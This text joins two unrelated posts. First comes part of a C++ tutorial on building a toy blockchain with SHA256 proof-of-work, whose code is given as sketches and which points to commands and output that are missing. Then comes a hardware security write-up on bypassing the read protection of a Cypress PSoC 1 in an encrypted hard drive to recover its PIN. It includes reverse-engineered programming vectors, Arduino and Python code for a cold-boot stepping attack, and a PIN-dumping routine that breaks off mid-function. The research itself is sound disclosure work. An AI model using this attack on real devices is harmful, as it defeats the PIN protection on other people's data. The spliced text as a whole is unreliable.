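A sketch of the class consistent with the line-by-line description below (the exact member types, e.g. uint32_t for the index, int64_t for the nonce and time_t for the timestamp, are assumptions):

class Block {
public:
    string sPrevHash;

    Block(uint32_t nIndexIn, const string &sDataIn);

    string GetHash();

    void MineBlock(uint32_t nDifficulty);

private:
    uint32_t _nIndex;
    int64_t _nNonce;
    string _sData;
    string _sHash;
    time_t _tTime;

    string _CalculateHash() const;
};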

Unsurprisingly, we’re calling our class Block (line 1) followed by the public modifier (line 2) and the public variable sPrevHash (remember each block is linked to the previous block) (line 3). The constructor signature (line 5) takes two parameters, nIndexIn and sDataIn; note that the const keyword is used along with the reference modifier (&) so that the data parameter is passed by reference but cannot be changed, which is done to improve efficiency and save memory. The GetHash method signature is specified next (line 7) followed by the MineBlock method signature (line 9), which takes a parameter nDifficulty. We specify the private modifier (line 11) followed by the private variables _nIndex, _nNonce, _sData, _sHash, and _tTime (lines 12–16). The signature for _CalculateHash (line 18) also has the const keyword; this is to ensure the output from the method cannot be changed, which is very useful when dealing with a blockchain.

Now it’s time to create our Blockchain.h header file in the main project folder.

Let’s start by adding these lines (if you’re using CLion place all code between the lines that read #define TESTCHAIN_BLOCKCHAIN_H and #endif):
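Something like the following sketch:

#include <cstdint>
#include <vector>

#include "Block.h"

using namespace std;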

They tell the compiler to include the cstdint, and vector libraries, as well as the Block.h header file we have just created, and creates a shortcut to the std namespace.

Now let’s create our blockchain class, add the following lines to the Blockchain.h header file:
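A sketch consistent with the description that follows:

class Blockchain {
public:
    Blockchain();

    void AddBlock(Block bNew);

private:
    uint32_t _nDifficulty;
    vector<Block> _vChain;

    Block _GetLastBlock() const;
};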

As with our block class, we’re keeping things simple and calling our blockchain class Blockchain (line 1) followed by the public modifier (line 2) and the constructor signature (line 3). The AddBlock signature (line 5) takes a parameter bNew which must be an object of the Block class we created earlier. We then specify the private modifier (line 7) followed by the private variables for _nDifficulty, and _vChain (lines 8–9) as well as the method signature for _GetLastBlock (line 11) which is also followed by the const keyword to denote that the output of the method cannot be changed.

Since blockchains use cryptography, now would be a good time to get some cryptographic functionality into our blockchain. We’re going to be using the SHA256 hashing technique to create hashes of our blocks; we could write our own but really, in this day and age of open source software, why bother?

To make my life that much easier, I copied and pasted the text for the sha256.h, sha256.cpp and LICENSE.txt files shown on the C++ sha256 function from Zedwood and saved them in the project folder.

Right, let’s keep going.

Create a source file for our block and save it as Block.cpp in the main project folder; you should be able to do this by right-clicking on the TestChain directory in the Project Tool Window and selecting: New > C/C++ Source File.

Start by adding these lines, which tell the compiler to include the Block.h and sha256.h files we added earlier.
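That is, something like:

#include "Block.h"
#include "sha256.h"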

Follow these with the implementation of our block constructor:
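A sketch matching the explanation below (the initializer list and time(nullptr) are assumptions; time() needs <ctime>, which many toolchains pull in indirectly, otherwise add the include):

Block::Block(uint32_t nIndexIn, const string &sDataIn) : _nIndex(nIndexIn), _sData(sDataIn) {
    _nNonce = -1;
    _tTime = time(nullptr);   // current timestamp
}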

The constructor starts off by repeating the signature we specified in the Block.h header file (line 1), but we also add code to copy the contents of the parameters into the variables _nIndex and _sData. The _nNonce variable is set to -1 (line 2) and the _tTime variable is set to the current time (line 3).

Let’s add an accessor for the block’s hash:
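For example:

string Block::GetHash() {
    return _sHash;
}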

We specify the signature for GetHash (line 1) and then add a return for the private variable _sHash (line 2).

As you might have read, blockchain technology was made popular when it was devised for the Bitcoin digital currency, as the ledger is both immutable and public; which means that, as one user transfers Bitcoin to another user, a transaction for the transfer is written into a block on the blockchain by nodes on the Bitcoin network. A node is another computer which is running the Bitcoin software and, since the network is peer-to-peer, it could be anyone around the world; this process is called ‘mining’ as the owner of the node is rewarded with Bitcoin each time they successfully create a valid block on the blockchain.

To successfully create a valid block, and therefore be rewarded, a miner must create a cryptographic hash of the block they want to add to the blockchain that matches the requirements for a valid hash at that time; this is achieved by counting the number of zeros at the beginning of the hash, if the number of zeros is equal to or greater than the difficulty level set by the network that block is valid. If the hash is not valid a variable called a nonce is incremented and the hash created again; this process, called Proof of Work (PoW), is repeated until a hash is produced that is valid.

So, with that being said, let’s add the MineBlock method; here’s where the magic happens!
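A sketch that matches the walkthrough below (the variable-length char array mirrors the description and is a g++ extension):

void Block::MineBlock(uint32_t nDifficulty) {
    char cstr[nDifficulty + 1];
    for (uint32_t i = 0; i < nDifficulty; ++i) {
        cstr[i] = '0';
    }
    cstr[nDifficulty] = '\0';

    string str(cstr);

    do {
        _nNonce++;
        _sHash = _CalculateHash();
    } while (_sHash.substr(0, nDifficulty) != str);

    cout << "Block mined: " << _sHash << endl;
}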

We start with the signature for the MineBlock method, which we specified in the Block.h header file (line 1), and create an array of characters with a length one greater than the value specified for nDifficulty (line 2). A for loop is used to fill the array with zeros, followed by the final array item being given the string terminator character (\0) (lines 3–6), then the character array or c-string is turned into a standard string (line 8). A do…while loop is then used (lines 10–13) to increment _nNonce and assign _sHash with the output of _CalculateHash; the front portion of the hash is then compared with the string of zeros we’ve just created, and if no match is found the loop is repeated until a match is found. Once a match is found a message is sent to the output buffer to say that the block has been successfully mined (line 15).

We’ve seen it mentioned a few times before, so let’s now add the _CalculateHash method:
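Something like this (it assumes <sstream> is available, e.g. pulled in by one of the included headers; otherwise add it):

inline string Block::_CalculateHash() const {
    stringstream ss;
    ss << _nIndex << _tTime << _sData << _nNonce << sPrevHash;

    return sha256(ss.str());
}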

We kick off with the signature for the _CalculateHash method (line 1), which we specified in the Block.h header file, but we include the inline keyword which makes the code more efficient as the compiler places the method’s instructions inline wherever the method is called; this cuts down on separate method calls. A string stream is then created (line 2), followed by appending the values for _nIndex, _tTime, _sData, _nNonce, and sPrevHash to the stream (line 3). We finish off by returning the output of the sha256 method (from the sha256 files we added earlier) using the string output from the string stream (line 5).

Right, let’s finish off our blockchain implementation! Same as before, create a source file for our blockchain and save it as Blockchain.cpp in the main project folder.

Add these lines, which tell the compiler to include the Blockchain.h file we added earlier.
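That is, simply:

#include "Blockchain.h"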

Follow these with the implementation of our blockchain constructor:
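A sketch matching the description below (the genesis block’s data string and the difficulty value 6 are arbitrary choices):

Blockchain::Blockchain() {
    _vChain.emplace_back(Block(0, "Genesis Block"));
    _nDifficulty = 6;
}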

We start off with the signature for the blockchain constructor we specified in Blockchain.h (line 1). As blocks are added to the blockchain they need to reference the previous block using its hash, but as the blockchain must start somewhere we have to create a block for the next block to reference; we call this a genesis block. A genesis block is created and placed onto the _vChain vector (line 2). We then set the _nDifficulty level (line 3) depending on how hard we want to make the PoW process.

Now it’s time to add the code for adding a block to the blockchain, add the following lines:
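For example:

void Blockchain::AddBlock(Block bNew) {
    bNew.sPrevHash = _GetLastBlock().GetHash();
    bNew.MineBlock(_nDifficulty);
    _vChain.push_back(bNew);
}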

The signature we specified in Blockchain.h for AddBlock is added (line 1) followed by setting the sPrevHash variable for the new block from the hash of the last block on the blockchain which we get using _GetLastBlock and its GetHash method (line 2). The block is then mined using the MineBlock method (line 3) followed by the block being added to the _vChain vector (line 4), thus completing the process of adding a block to the blockchain.

Let’s finish this file off by adding the last method:
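Something like:

Block Blockchain::_GetLastBlock() const {
    return _vChain.back();
}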

We add the signature for _GetLastBlock from Blockchain.h (line 1) followed by returning the last block found in the _vChain vector using its back method (line 2).

Right, that’s almost it, let’s test it out!

Remember the main.cpp file? Now’s the time to update it, open it up and replace the contents with the following lines:
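Which would be just:

#include "Blockchain.h"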

This tells the compiler to include the Blockchain.h file we created earlier.

Then add the following lines:
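A sketch matching the walkthrough below (the block data strings are arbitrary):

int main() {
    Blockchain bChain = Blockchain();

    cout << "Mining block 1..." << endl;
    bChain.AddBlock(Block(1, "Block 1 Data"));

    cout << "Mining block 2..." << endl;
    bChain.AddBlock(Block(2, "Block 2 Data"));

    cout << "Mining block 3..." << endl;
    bChain.AddBlock(Block(3, "Block 3 Data"));

    return 0;
}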

As with most C/C++ programs, everything is kicked off by calling the main method, this one creates a new blockchain (line 2) and informs the user that a block is being mined by printing to the output buffer (line 4) then creates a new block and adds it to the chain (line 5); the process for mining that block will then kick off until a valid hash is found. Once the block is mined the process is repeated for two more blocks.

Time to run it! If you are using CLion simply hit the ‘Run TestChain’ button in the top right hand corner of the window. If you’re old skool, you can compile and run the program using the following commands from the command line:

If all goes well you should see an output like this:

Congratulations, you have just written a blockchain from scratch in C++, in case you got lost I’ve put all the files into a Github repo. Since the original code for Bitcoin was also written in C++, why not take a look at its code and see what improvements you can make to what we’ve started off today?

Orig post

Aigo Chinese encrypted HDD − Part 2: Dumping the Cypress PSoC 1

Original post by Raphaël Rigo on syscall.eu ( under CC-BY-SA 4.0 )

TL;DR

I dumped a Cypress PSoC 1 (CY8C21434) flash memory, bypassing the protection, by doing a cold-boot stepping attack, after reversing the undocumented details of the in-system serial programming protocol (ISSP).

It allows me to dump the PIN of the hard-drive from part 1 directly:

$ ./psoc.py 
syncing:  KO  OK
[...]
PIN:  1 2 3 4 5 6 7 8 9  

Code:

Introduction

So, as we have seen in part 1, the Cypress PSoC 1 CY8C21434 microcontroller seems like a good target, as it may contain the PIN itself. And anyway, I could not find any public attack code, so I wanted to take a look at it.

Our goal is to read its internal flash memory and so, the steps we have to cover here are to:

  • manage to “talk” to the microcontroller
  • find a way to check if it is protected against external reads (most probably)
  • find a way to bypass the protection

There are 2 places where we can look for the valid PIN:

  • the internal flash memory
  • the SRAM, where it may be stored to compare it to the PIN entered by the user

ISSP Protocol

ISSP ??

“Talking” to a micro-controller can imply different things from vendor to vendor but most of them implement a way to interact using a serial protocol (ICSP for Microchip’s PIC for example).

Cypress’ own proprietary protocol is called ISSP, for “in-system serial programming protocol”, and is (partially) described in its documentation. US Patent US7185162 also gives some information.

There is also an open source implementation called HSSP, which we will use later.

ISSP basically works like this:

  • reset the µC
  • output a magic number to the serial data pin of the µC to enter external programming mode
  • send commands, which are actually long strings of bits called “vectors”

The ISSP documentation only defines a handful of such vectors:

  • Initialize-1
  • Initialize-2
  • Initialize-3 (3V and 5V variants)
  • ID-SETUP
  • READ-ID-WORD
  • SET-BLOCK-NUM: 10011111010dddddddd111 where dddddddd=block #
  • BULK ERASE
  • PROGRAM-BLOCK
  • VERIFY-SETUP
  • READ-BYTE: 10110aaaaaaZDDDDDDDDZ1 where DDDDDDDD = data out, aaaaaa = address (6 bits)
  • WRITE-BYTE: 10010aaaaaadddddddd111 where dddddddd = data in, aaaaaa = address (6 bits)
  • SECURE
  • CHECKSUM-SETUP
  • READ-CHECKSUM: 10111111001ZDDDDDDDDZ110111111000ZDDDDDDDDZ1 where DDDDDDDDDDDDDDDD = Device Checksum data out
  • ERASE BLOCK

For example, the vector for Initialize-2 is:

1101111011100000000111 1101111011000000000111
1001111100000111010111 1001111100100000011111
1101111010100000000111 1101111010000000011111
1001111101110000000111 1101111100100110000111
1101111101001000000111 1001111101000000001111
1101111000000000110111 1101111100000000000111
1101111111100010010111

Each vector is 22 bits long and seems to follow some pattern. Thankfully, the HSSP doc gives us a big hint: “ISSP vector is nothing but a sequence of bits representing a set of instructions.”

Demystifying the vectors

Now, of course, we want to understand what’s going on here. At first, I thought the vectors could be raw M8C instructions, but the opcodes did not match.

Then I just googled the first vector and found this research by Ahmed Ismail which, while it does not go into much detail, gives a few hints to get started: “Each instruction starts with 3 bits that select 1 out of 4 mnemonics (read RAM location, write RAM location, read register, or write register.) This is followed by the 8-bit address, then the 8-bit data read or written, and finally 3 stop bits.”

Then, reading the Technical Reference Manual’s section on the Supervisory ROM (SROM) is very useful. The SROM is hardcoded (ROM) in the PSoC and provides functions (like syscalls) for code running in “userland”:

  • 00h : SWBootReset
  • 01h : ReadBlock
  • 02h : WriteBlock
  • 03h : EraseBlock
  • 06h : TableRead
  • 07h : CheckSum
  • 08h : Calibrate0
  • 09h : Calibrate1

By comparing the vector names with the SROM functions, we can match the various operations supported by the protocol with the expected SROM parameters.

This gives us a decoding of the first 3 bits (see the small decoder sketch after the list):

  • 100 => “wrmem”
  • 101 => “rdmem”
  • 110 => “wrreg”
  • 111 => “rdreg”
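
Putting this mapping together with Ahmed Ismail’s hint (3-bit mnemonic, 8-bit address, 8-bit data, 3 stop bits), a minimal decoder is easy to sketch. This is my own helper, not part of the original tooling; it matches the wrreg/wrmem lines of the vector disassembly shown below, while the documented READ-BYTE/WRITE-BYTE vectors use a shorter, 6-bit address form:

# Sketch: decode one 22-bit vector, assuming the layout
# [3-bit mnemonic][8-bit address][8-bit data][3 stop bits]
MNEMONICS = {0b100: "wrmem", 0b101: "rdmem", 0b110: "wrreg", 0b111: "rdreg"}

def decode_vector(bits):
    assert len(bits) == 22
    mnemo = MNEMONICS.get(int(bits[0:3], 2), "???")
    addr = int(bits[3:11], 2)
    data = int(bits[11:19], 2)    # don't-care ("Z") bits for the read vectors
    return "%s 0x%02X, 0x%02X" % (mnemo, addr, data)

# First line of Initialize-2 -> "wrreg 0xF7, 0x00" (CPU_F), matching the disassembly below
print(decode_vector("1101111011100000000111"))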

But to fully understand what is going on, it is better to be able to interact with the µC.

Talking to the PSoC

As Dirk Petrautzki already ported Cypress’ HSSP code to Arduino, I used an Arduino Uno to connect to the ISSP header of the keyboard PCB.

Note that over the course of my research, I modified Dirk’s code quite a lot; you can find my fork on GitHub here, and the corresponding Python script to interact with the Arduino in my cypress_psoc_tools repository.

So, using the Arduino, I first used only the “official” vectors to interact, and tried to read the internal flash using the VERIFY command. This failed, as expected, most probably because of the flash protection bits.

I then built my own simple vectors to read/write memory/registers.
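
Building a write vector is just the inverse operation. A minimal encoder sketch of mine, under the same layout assumptions as the decoder above (write vectors only; the read vectors clock out data in place of the 8 data bits):

OPS = {"wrmem": 0b100, "wrreg": 0b110}

def encode_vector(op, addr, data):
    # 3-bit mnemonic + 8-bit address + 8-bit data + 3 stop bits = 22 bits
    return "{:03b}{:08b}{:08b}111".format(OPS[op], addr, data)

# Reproduces the first line of Initialize-2: wrreg CPU_F (f7), 0x00
assert encode_vector("wrreg", 0xF7, 0x00) == "1101111011100000000111"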

Note that we can read the whole SRAM, even though the flash is protected !

Identifying internal registers

After looking at the vector’s “disassembly”, I realized that some undocumented registers (0xF8-0xFA) were used to specify M8C opcodes to execute directly !

This let me run various opcodes such as ADD, MOV A,X, PUSH or JMP and, by looking at the side effects on all the registers, identify which undocumented registers actually are the “usual” ones (A, X, SP and PC).

In the end, the vector’s “disassembly” generated by HSSP_disas.rb looks like this, with comments added for clarity:

--== init2 ==--
[DE E0 1C] wrreg CPU_F (f7), 0x00      # reset flags
[DE C0 1C] wrreg SP (f6), 0x00         # reset SP
[9F 07 5C] wrmem KEY1, 0x3A            # Mandatory arg for SSC
[9F 20 7C] wrmem KEY2, 0x03            # same
[DE A0 1C] wrreg PCh (f5), 0x00        # reset PC (MSB) ...
[DE 80 7C] wrreg PCl (f4), 0x03        # (LSB) ... to 3 ??
[9F 70 1C] wrmem POINTER, 0x80         # RAM pointer for output data
[DF 26 1C] wrreg opc1 (f9), 0x30       # Opcode 1 => "HALT"
[DF 48 1C] wrreg opc2 (fa), 0x40       # Opcode 2 => "NOP"
[9F 40 3C] wrmem BLOCKID, 0x01         # BLOCK ID for SSC call
[DE 00 DC] wrreg A (f0), 0x06          # "Syscall" number : TableRead
[DF 00 1C] wrreg opc0 (f8), 0x00       # Opcode for SSC, "Supervisory SROM Call"
[DF E2 5C] wrreg CPU_SCR0 (ff), 0x12   # Undocumented op: execute external opcodes

Security bits

At this point, I am able to interact with the PSoC, but I need reliable information about the protection bits of the flash. I was really surprised that Cypress did not give users any means to check the protection status. So, I dug a bit more on Google and finally realized that the HSSP code provided by Cypress was updated after Dirk’s fork.

And lo ! The following new vector appears:

[DE E0 1C] wrreg CPU_F (f7), 0x00
[DE C0 1C] wrreg SP (f6), 0x00
[9F 07 5C] wrmem KEY1, 0x3A
[9F 20 7C] wrmem KEY2, 0x03
[9F A0 1C] wrmem 0xFD, 0x00           # Unknown args
[9F E0 1C] wrmem 0xFF, 0x00           # same
[DE A0 1C] wrreg PCh (f5), 0x00
[DE 80 7C] wrreg PCl (f4), 0x03
[9F 70 1C] wrmem POINTER, 0x80
[DF 26 1C] wrreg opc1 (f9), 0x30
[DF 48 1C] wrreg opc2 (fa), 0x40
[DE 02 1C] wrreg A (f0), 0x10         # Undocumented syscall !
[DF 00 1C] wrreg opc0 (f8), 0x00
[DF E2 5C] wrreg CPU_SCR0 (ff), 0x12

By using this vector (see read_security_data in psoc.py), we get all the protection bits in SRAM at 0x80, with 2 bits per block.
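
As a rough idea of what read_security_data boils down to, here is a sketch using the read_ramb helper from psoc.py (it returns the byte as an integer). The in-byte packing order is my assumption and was not verified on the device:

def read_protection_levels():
    # 8192 bytes of flash / 64-byte blocks = 128 blocks, 2 bits each -> 32 bytes at 0x80
    levels = []
    for i in range(32):
        byte = read_ramb(0x80 + i)
        for j in range(4):            # assumed packing: 4 blocks per byte, LSBs first
            levels.append((byte >> (2 * j)) & 0b11)
    return levels                     # one 2-bit protection level per flash block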

The result is depressing: everything is protected in “Disable external read and write” mode, so we cannot even write to the flash to insert a ROM dumper. The only way to reset the protection is to erase the whole chip 🙁

First (failed) attack: ROMX

However, we can try a trick: since we can execute arbitrary opcodes, why not execute ROMX, which is used to read the flash ?

The reasoning here is that the SROM ReadBlock function used by the programming vectors will verify if it is called from ISSP. However, the ROMX opcode probably has no such check.

So, in Python (after adding a few helpers in the Arduino C code):

for i in range(0, 8192):
    write_reg(0xF0, i>>8)        # A = high byte of the address
    write_reg(0xF3, i&0xFF)      # X = low byte of the address
    exec_opcodes("\x28\x30\x40") # ROMX, HALT, NOP
    byte = read_reg(0xF0)        # ROMX reads ROM[A|X] into A
    print "%02x" % ord(byte[0])  # print ROM byte

Unfortunately, it does not work 🙁 Or rather, it works, but we get our own opcodes (0x28 0x30 0x40) back ! I do not think it was intended as a protection, but rather as an engineering trick: when executing external opcodes, the ROM bus is rewired to a temporary buffer.

Second attack: cold boot stepping

Since ROMX did not work, I thought about using a variation of the trick described in section 3.1 of Johannes Obermaier and Stefan Tatschner’s paper: Shedding too much Light on a Microcontroller’s Firmware Protection.

Implementation

The ISSP manual gives us the following CHECKSUM-SETUP vector:

[DE E0 1C] wrreg CPU_F (f7), 0x00
[DE C0 1C] wrreg SP (f6), 0x00
[9F 07 5C] wrmem KEY1, 0x3A
[9F 20 7C] wrmem KEY2, 0x03
[DE A0 1C] wrreg PCh (f5), 0x00
[DE 80 7C] wrreg PCl (f4), 0x03
[9F 70 1C] wrmem POINTER, 0x80
[DF 26 1C] wrreg opc1 (f9), 0x30
[DF 48 1C] wrreg opc2 (fa), 0x40
[9F 40 1C] wrmem BLOCKID, 0x00
[DE 00 FC] wrreg A (f0), 0x07
[DF 00 1C] wrreg opc0 (f8), 0x00
[DF E2 5C] wrreg CPU_SCR0 (ff), 0x12

Which is just a call to SROM function 0x07, documented as follows (emphasis mine):

The Checksum function calculates a 16-bit checksum over a user specifiable number of blocks, within a single Flash bank starting at block zero. The BLOCKID parameter is used to pass in the number of blocks to checksum. A BLOCKID value of ‘1’ will calculate the checksum of only block 0, while a BLOCKID value of ‘0’ will calculate the checksum of 256 blocks in the bank. The 16-bit checksum is returned in KEY1 and KEY2. The parameter KEY1 holds the lower 8 bits of the checksum and the parameter KEY2 holds the upper 8 bits of the checksum. For devices with multiple Flash banks, the checksum function must be called once for each Flash bank. The SROM Checksum function will operate on the Flash bank indicated by the Bank bit in the FLS_PR1 register.

Note that it is an actual checksum: bytes are summed one by one, no fancy CRC here. Also, considering the extremely limited register set of the M8C core, I suspected that the checksum would be directly stored in RAM, most probably in its final location: KEY1 (0xF8) / KEY2 (0xF9).
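
In other words, a minimal model of the expected result, assuming a plain byte-wise sum truncated to 16 bits (which is what the rest of the attack relies on):

def flash_checksum(data):
    return sum(data) & 0xFFFF

# e.g. after the first flash byte (0x80, see the dump below) the checksum should read 0x0080
assert flash_checksum([0x80]) == 0x0080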

So the final attack is, in theory:

  1. Connect using ISSP
  2. Start a checksum computation using the CHECKSUM-SETUP vector
  3. Reset the CPU after some time T
  4. Read the RAM to get the current checksum C
  5. Repeat 3. and 4., increasing T a little each time
  6. Recover the flash content by subtracting consecutive checksums C

However, we have a problem: the Initialize-1 vector, which we have to send after reset, overwrites KEY1 and KEY2:

1100101000000000000000                 # Magic to put the PSoC in prog mode
nop
nop
nop
nop
nop
[DE E0 1C] wrreg CPU_F (f7), 0x00
[DE C0 1C] wrreg SP (f6), 0x00
[9F 07 5C] wrmem KEY1, 0x3A            # Checksum overwritten here
[9F 20 7C] wrmem KEY2, 0x03            # and here
[DE A0 1C] wrreg PCh (f5), 0x00
[DE 80 7C] wrreg PCl (f4), 0x03
[9F 70 1C] wrmem POINTER, 0x80
[DF 26 1C] wrreg opc1 (f9), 0x30
[DF 48 1C] wrreg opc2 (fa), 0x40
[DE 01 3C] wrreg A (f0), 0x09          # SROM function 9
[DF 00 1C] wrreg opc0 (f8), 0x00       # SSC
[DF E2 5C] wrreg CPU_SCR0 (ff), 0x12

But this code, overwriting our precious checksum, is just calling Calibrate1 (SROM function 9)… Maybe we can just send the magic to enter prog mode and then read the SRAM ?

And yes, it works !

The Arduino code implementing the attack is quite simple:

    case Cmnd_STK_START_CSUM:
      checksum_delay = ((uint32_t)getch())<<24;
      checksum_delay |= ((uint32_t)getch())<<16;
      checksum_delay |= ((uint32_t)getch())<<8;
      checksum_delay |= getch();
      if(checksum_delay > 10000) {
         ms_delay = checksum_delay/1000;
         checksum_delay = checksum_delay%1000;
      }
      else {
         ms_delay = 0;
      }
      send_checksum_v();
      if(checksum_delay)
          delayMicroseconds(checksum_delay);
      delay(ms_delay);
      start_pmode();

It works as follows:

  1. It reads the checksum_delay
  2. Starts computing the checksum (send_checksum_v)
  3. Waits for the appropriate amount of time, with some caveats:
    • I lost some time here until I realized delayMicroseconds is precise only up to 16383µs
    • and then again because delayMicroseconds(0) is totally wrong !
  4. Resets the PSoC to prog mode (without sending the initialization vectors, just the magic)

The final Python code is:

for delay in range(0, 150000):                          # delay in microseconds
    for i in range(0, 10):                              # number of reads for each delay
        try:
            reset_psoc(quiet=True)                      # reset and enter prog mode
            send_vectors()                              # send init vectors
            ser.write("\x85"+struct.pack(">I", delay))  # do checksum + reset after delay
            res = ser.read(1)                           # read arduino ACK
        except Exception as e:
            print e
            ser.close()
            os.system("timeout -s KILL 1s picocom -b 115200 /dev/ttyACM0 2>&1 > /dev/null")
            ser = serial.Serial('/dev/ttyACM0', 115200, timeout=0.5)  # open serial port
            continue
        print "%05d %02X %02X %02X" % (delay,           # read RAM bytes
                                       read_regb(0xf1),
                                       read_ramb(0xf8),
                                       read_ramb(0xf9))

What it does is simple:

  1. Reset the PSoC (and send the magic)
  2. Send the full initialization vectors
  3. Call the Cmnd_STK_START_CSUM (0x85) function on the Arduino, with a delay argument in microseconds.
  4. Read the checksum (0xF8 and 0xF9) and the undocumented register 0xF1

This, 10 times per 1 microsecond step.

0xF1 is included as it was the only register that seemed to change while computing the checksum. It could be some temporary register used by the ALU ?

Note the ugly hack I use to reset the Arduino using picocom, when it stops responding (I have no idea why).

Reading the results

The output of the Python script looks like this (simplified for readability):

DELAY F1 F8 F9  # F1 is the unknown reg
                # F8 is the checksum LSB
                # F9 is the checksum MSB

00000 03 E1 19
[...]
00016 F9 00 03
00016 F9 00 00
00016 F9 00 03
00016 F9 00 03
00016 F9 00 03
00016 F9 00 00  # Checksum is reset to 0
00017 FB 00 00
[...]
00023 F8 00 00
00024 80 80 00  # First byte is 0x0080-0x0000 = 0x80 
00024 80 80 00
00024 80 80 00
[...]
00057 CC E7 00  # 2nd byte is 0xE7-0x80: 0x67
00057 CC E7 00
00057 01 17 01  # I have no idea what's going on here
00057 01 17 01
00057 01 17 01
00058 D0 17 01
00058 D0 17 01
00058 D0 17 01
00058 D0 17 01
00058 F8 E7 00  # E7 is back ?
00058 D0 17 01
[...]
00059 E7 E7 00
00060 17 17 00  # Hmmm
[...]
00062 00 17 00
00062 00 17 00
00063 01 17 01  # Oh ! Carry is propagated to MSB
00063 01 17 01
[...]
00075 CC 17 01  # So 0x117-0xE7: 0x30

However, we have the problem that since this is a real checksum, a null byte will not change the value, so we cannot simply look for changes in the checksum. But, since the full (8192 bytes) computation runs in 0.1478s, which translates to about 18.04µs per byte, we can use this timing to sample the value of the checksum at the right points in time.
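
A quick way to turn that timing into sampling points (a sketch; it ignores the small startup offset before the first byte is summed, and the per-byte time is only an average):

PER_BYTE_US = 0.1478e6 / 8192      # ~18.04 µs per byte

def delay_for_byte(n):
    # approximate reset delay (in µs) to sample the checksum right after byte n
    return int(n * PER_BYTE_US)

print(delay_for_byte(8064))        # -> 145490, the ballpark of the delays used later in dump_pin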

Of course at the beginning, everything is “easy” to read as the variation in execution time is negligible. But the end of the dump is less precise as the variability of each run increases:

134023 D0 02 DD
134023 CC D2 DC
134023 CC D2 DC
134023 CC D2 DC
134023 FB D2 DC
134023 3F D2 DC
134023 CC D2 DC
134024 02 02 DC
134024 CC D2 DC
134024 F9 02 DC
134024 03 02 DD
134024 21 02 DD
134024 02 D2 DC
134024 02 02 DC
134024 02 02 DC
134024 F8 D2 DC
134024 F8 D2 DC
134025 CC D2 DC
134025 EF D2 DC
134025 21 02 DD
134025 F8 D2 DC
134025 21 02 DD
134025 CC D2 DC
134025 04 D2 DC
134025 FB D2 DC
134025 CC D2 DC
134025 FB 02 DD
134026 03 02 DD
134026 21 02 DD

Hence the 10 dumps for each µs of delay. The total running time to dump the 8192 bytes of flash was about 48h.

Reconstructing the flash image

I have not yet written the code to fully recover the flash, taking into account all the timing problems. However, I did recover the beginning. To make sure it was correct, I disassembled it with m8cdis:

0000: 80 67     jmp   0068h         ; Reset vector
[...]
0068: 71 10     or    F,010h
006a: 62 e3 87  mov   reg[VLT_CR],087h
006d: 70 ef     and   F,0efh
006f: 41 fe fb  and   reg[CPU_SCR1],0fbh
0072: 50 80     mov   A,080h
0074: 4e        swap  A,SP
0075: 55 fa 01  mov   [0fah],001h
0078: 4f        mov   X,SP
0079: 5b        mov   A,X
007a: 01 03     add   A,003h
007c: 53 f9     mov   [0f9h],A
007e: 55 f8 3a  mov   [0f8h],03ah
0081: 50 06     mov   A,006h
0083: 00        ssc
[...]
0122: 18        pop   A
0123: 71 10     or    F,010h
0125: 43 e3 10  or    reg[VLT_CR],010h
0128: 70 00     and   F,000h ; Paging mode changed from 3 to 0
012a: ef 62     jacc  008dh
012c: e0 00     jacc  012dh
012e: 71 10     or    F,010h
0130: 62 e0 02  mov   reg[OSC_CR0],002h
0133: 70 ef     and   F,0efh
0135: 62 e2 00  mov   reg[INT_VC],000h
0138: 7c 19 30  lcall 1930h
013b: 8f ff     jmp   013bh
013d: 50 08     mov   A,008h
013f: 7f        ret

It looks good !

Locating the PIN address

Now that we can read the checksum at arbitrary points in time, we can check easily if and where it changes after:

  • entering a wrong PIN
  • changing the PIN

First, to locate the approximate location, I dumped the checksum in steps for 10ms after reset. Then I entered a wrong PIN and did the same.

The results were not very nice as there’s a lot of variation, but it appeared that the checksum changes between 120000µs and 140000µs of delay. Which was actually completely false and an artefact of delayMicroseconds doing nonsense when called with 0.

Then, after losing about 3 hours, I remembered that the SROM’s CheckSum syscall has an argument that allows us to specify the number of blocks to checksum ! So we can easily locate the PIN and “bad PIN” counter down to a 64-byte block.

My initial runs gave:

No bad PIN          |   14 tries remaining  |   13 tries remaining
                    |                       |
block 125 : 0x47E2  |   block 125 : 0x47E2  |   block 125 : 0x47E2
block 126 : 0x6385  |   block 126 : 0x634F  |   block 126 : 0x6324
block 127 : 0x6385  |   block 127 : 0x634F  |   block 127 : 0x6324
block 128 : 0x82BC  |   block 128 : 0x8286  |   block 128 : 0x825B

Then I changed the PIN from “123456” to “1234567”, and I got:

No bad try            14 tries remaining
block 125 : 0x47E2    block 125 : 0x47E2
block 126 : 0x63BE    block 126 : 0x6355
block 127 : 0x63BE    block 127 : 0x6355
block 128 : 0x82F5    block 128 : 0x828C

So both the PIN and “bad PIN” counter seem to be stored in block 126.
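
Reading those tables programmatically is straightforward (a small sketch): since the checksum is cumulative over the first N blocks, the first N where the two runs diverge points at the block that changed.

def first_diverging_n(before, after):
    # before/after map "number of blocks checksummed" -> 16-bit checksum
    for n in sorted(before):
        if before[n] != after[n]:
            return n
    return None

no_bad_pin  = {125: 0x47E2, 126: 0x6385, 127: 0x6385, 128: 0x82BC}
one_bad_pin = {125: 0x47E2, 126: 0x634F, 127: 0x634F, 128: 0x8286}
print(first_diverging_n(no_bad_pin, one_bad_pin))   # -> 126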

Dumping block 126

Block 126 should be about 125x64x18 = 144000µs after the start of the checksum. To make sure, I looked for checksum 0x47E2 in my full dump, and it looked more or less correct.

Then, after dumping lots of imprecise (because of timing) data, manually fixing the results and comparing flash values (by staring at them), I finally got the following bytes at delay 145527µs:

PIN          Flash content
1234567      2526272021222319141402
123456       2526272021221919141402
998877       2d2d2c2c23231914141402
0987654      242d2c2322212019141402
123456789    252627202122232c2d1902

It is quite obvious that the PIN is stored directly in plaintext ! The values are not ASCII or raw values but probably reflect the readings from the capacitive keyboard.

Finally, I did some other tests to find where the “bad PIN” counter is, and found this :

Delay  CSUM
145996 56E5 (old: 56E2, val: 03)
146020 571B (old: 56E5, val: 36)
146045 5759 (old: 571B, val: 3E)
146061 57F2 (old: 5759, val: 99)
146083 58F1 (old: 57F2, val: FF) <<---- here
146100 58F2 (old: 58F1, val: 01)

0xFF means “15 tries” and it gets decremented with each bad PIN entered.

Recovering the PIN

Putting everything together, my ugly code for recovering the PIN is:

def dump_pin():
    pin_map = {0x24: "0", 0x25: "1", 0x26: "2", 0x27:"3", 0x20: "4", 0x21: "5",
               0x22: "6", 0x23: "7", 0x2c: "8", 0x2d: "9"}
    last_csum = 0
    pin_bytes = []
    for delay in range(145495, 145719, 16):
        csum = csum_at(delay, 1)
        byte = (csum-last_csum)&0xFF
